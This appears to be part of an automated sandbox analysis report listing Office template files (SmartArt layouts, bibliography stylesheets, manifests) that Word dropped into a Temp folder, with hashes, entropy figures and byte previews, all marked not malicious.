                                                                                    SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4D9.tmp\architecture.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):5783
                                                                                    Entropy (8bit):7.88616857639663
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                    MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                    SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                    SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                    SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                    Malicious:false
                                                                                    Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4DA.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):374
                                                                                    Entropy (8bit):3.5414485333689694
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                                                    MD5:2F7A8FE4E5046175500AFFA228F99576
                                                                                    SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                                                    SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                                                    SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4DA.tmp\Text Sidebar (Annual Report Red and Black design).docx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):47296
                                                                                    Entropy (8bit):6.42327948041841
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                    MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                    SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                    SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                    SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                    Malicious:false
                                                                                    Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4FA.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):302
                                                                                    Entropy (8bit):3.537169234443227
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:9C00979164E78E3B890E56BE2DF00666
                                                                                    SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                                                    SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                                                    SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4FA.tmp\iso690nmerical.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):217137
                                                                                    Entropy (8bit):5.068335381017074
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                    MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                    SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                    SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                    SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE50B.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):252
                                                                                    Entropy (8bit):3.48087342759872
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                    MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                    SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                    SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                    SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE50B.tmp\PictureFrame.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):4326
                                                                                    Entropy (8bit):7.821066198539098
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                    MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                    SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                    SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                    SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                    Malicious:false
                                                                                    Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE51B.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):292
                                                                                    Entropy (8bit):3.5026803317779778
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:A0D51783BFEE86F3AC46A810404B6796
                                                                                    SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                                                    SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                                                    SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE51B.tmp\gosttitle.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):251032
                                                                                    Entropy (8bit):5.102652100491927
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                    MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                    SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                    SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                    SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE51C.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):286
                                                                                    Entropy (8bit):3.538396048757031
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:149948E41627BE5DC454558E12AF2DA4
                                                                                    SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                                                    SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                                                    SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE51C.tmp\sist02.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):250983
                                                                                    Entropy (8bit):5.057714239438731
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                    MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                    SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                    SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                    SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE51D.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):254
                                                                                    Entropy (8bit):3.4721586910685547
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                    MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                    SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                    SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                    SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE51D.tmp\chevronaccent.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):4243
                                                                                    Entropy (8bit):7.824383764848892
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                    MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                    SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                    SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                    SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                    Malicious:false
                                                                                    Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE51E.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):260
                                                                                    Entropy (8bit):3.494357416502254
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                                                    MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                                                    SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                                                    SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                                                    SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE51E.tmp\ThemePictureGrid.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):6193
                                                                                    Entropy (8bit):7.855499268199703
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                    MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                    SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                    SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                    SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                    Malicious:false
                                                                                    Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE52F.tmp\CircleProcess.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):16806
                                                                                    Entropy (8bit):7.9519793977093505
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                    MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                    SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                    SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                    SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                    Malicious:false
